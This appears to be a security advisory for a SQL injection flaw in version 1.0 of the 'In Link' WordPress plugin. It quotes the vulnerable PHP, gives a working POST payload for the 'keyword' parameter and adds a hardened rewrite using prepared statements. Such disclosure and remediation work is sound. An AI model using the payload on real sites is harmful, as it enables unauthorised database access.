WordPress In Link 1.0 SQL Injection

2017.11.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Vulnerability Type: SQL injection in POST parameter "keyword"

Affected plugin:
---------------------------------------
In Link
Version: 1.0
Requires WordPress Version: 2.8 or higher
Compatible up to: 2.8
URL: https://wordpress.org/plugins/inlinks/ (plugin has been closed after the report)
---------------------------------------

Affected file: inlinks/inlinks.php

Affected lines:

    58 $Keyword = trim($_POST['keyword']);
    59 $URL = trim($_POST['url']);
    60 $Rel = trim($_POST['rel']);
    61 $Target = trim($_POST['target']);
    62 $table_name = $wpdb->prefix ."URLKeywordsMapping";
    63 $SelectKeywordURLMappingDetails = "select * from $table_name where FldKeyword LIKE '".$Keyword."'" ;
    64
    65 $KeywordURLMappingDetails = $wpdb->get_results($SelectKeywordURLMappingDetails);
    66
    67 if(count($KeywordURLMappingDetails))
    68 {
    69 $Message = "<div align='center' style=\"color:red; font-weight:bold;\">The keyword <i>".$Keyword."</i> already exists in the table.</div>";
    70 }

More issues seem to exist in the plugin because of the lack of input validation and the lack of prepared statements.

Affected URL:
/wp-admin/options-general.php?page=inlinks%2Finlinks.php

POST Parameters (with payload):
keyword=gweeperx'or+2=2--+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add

Tested against:
* In Link 1.0
* WordPress 4.9
* mysql Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using EditLine wrapper
* PHP 7.0.22-0ubuntu0.16.04.1
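The root cause in line 63 is that the raw POST value is concatenated into the query string, so a single quote in "keyword" ends the literal and the rest of the input becomes SQL. The block below is an added example, not the plugin's own code, showing the affected check next to a hardened rewrite that binds the value through $wpdb->prepare() and escapes the LIKE wildcards with $wpdb->esc_like(). It assumes it runs inside a WordPress admin page handler where $wpdb is available; the function names, the 'manage_options' capability check and the nonce action 'inlinks_add_keyword' are hypothetical hardening choices and do not come from the plugin.

```php
<?php
// Added example, not the In Link plugin's code. Contrasts the reported
// pattern (inlinks.php lines 62-69) with a parameterised rewrite.
// Assumes a WordPress admin context with the global $wpdb available.

// --- As reported: user input concatenated straight into the SQL string ---
function inlinks_keyword_exists_vulnerable( $wpdb, $keyword ) {
    $table_name = $wpdb->prefix . 'URLKeywordsMapping';
    // A quote inside $keyword closes the literal, so the remainder of the
    // input is parsed as SQL rather than compared as data.
    $sql = "select * from $table_name where FldKeyword LIKE '" . $keyword . "'";
    return count( (array) $wpdb->get_results( $sql ) ) > 0;
}

// --- Hardened form: placeholder binding plus LIKE wildcard escaping ---
function inlinks_keyword_exists_safe( $wpdb, $keyword ) {
    $table_name = $wpdb->prefix . 'URLKeywordsMapping';
    // esc_like() neutralises % and _ so the caller cannot widen the match;
    // prepare() quotes and escapes the bound value, so it is only ever data.
    $sql = $wpdb->prepare(
        "SELECT FldKeyword FROM {$table_name} WHERE FldKeyword LIKE %s",
        $wpdb->esc_like( $keyword )
    );
    // get_var() returns null when no row matches.
    return $wpdb->get_var( $sql ) !== null;
}

// Handler showing where authorisation, nonce and input checks sit
// relative to the query. Capability and nonce names are hypothetical.
function inlinks_handle_add_keyword( $wpdb ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'inlinks_add_keyword' ); // hypothetical nonce action

    // wp_unslash() undoes WordPress' magic-quotes slashing before sanitising.
    $keyword = isset( $_POST['keyword'] )
        ? sanitize_text_field( wp_unslash( $_POST['keyword'] ) )
        : '';
    if ( $keyword === '' ) {
        return 'A keyword is required.';
    }
    if ( inlinks_keyword_exists_safe( $wpdb, $keyword ) ) {
        // esc_html() so the reflected keyword cannot carry markup into the page.
        return '<div style="color:red; font-weight:bold;">The keyword <i>'
            . esc_html( $keyword ) . '</i> already exists in the table.</div>';
    }
    return '';
}
```

The other POST parameters (url, rel, target) should be bound the same way wherever they reach a query; the same prepare()-with-placeholder pattern covers the INSERT that follows the existence check.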



Copyright 2018, cxsecurity.com
